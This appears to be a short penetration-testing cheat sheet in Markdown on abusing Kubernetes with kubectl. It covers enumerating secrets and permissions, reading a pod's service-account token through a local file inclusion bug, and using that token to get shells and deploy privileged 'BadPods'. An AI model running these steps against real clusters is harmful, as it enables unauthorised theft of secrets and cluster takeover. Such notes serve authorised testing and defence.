38 lines
950 B
Markdown
38 lines
950 B
Markdown
# Kubectl
|
|
|
|
```sh
|
|
kubectl get pods
|
|
```
|
|
* Check mounted secret
|
|
```sh
|
|
kubectl auth can-i --list
|
|
kubectl get secrets
|
|
kubectl get nodes
|
|
kubectl get deployments
|
|
kubectl get services
|
|
kubectl get ingress
|
|
kubectl get jobs
|
|
```
|
|
* Intel about a secret, and output
|
|
```sh
|
|
kubectl describe secrets <secret>
|
|
kubectl describe secrets <secret> -o 'json'
|
|
```
|
|
## Abuse Token
|
|
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
|
|
* By change of an LFI extract the token and
|
|
```sh
|
|
kubectl auth can-i --list --token=$TOKEN
|
|
kubectl get pods --token=$TOKEN
|
|
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
|
|
```
|
|
|
|
## Create Pods
|
|
|
|
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
|
|
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
|
|
```sh
|
|
kubectl apply -f pod.yml --token=$TOKEN
|
|
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
|
|
```
|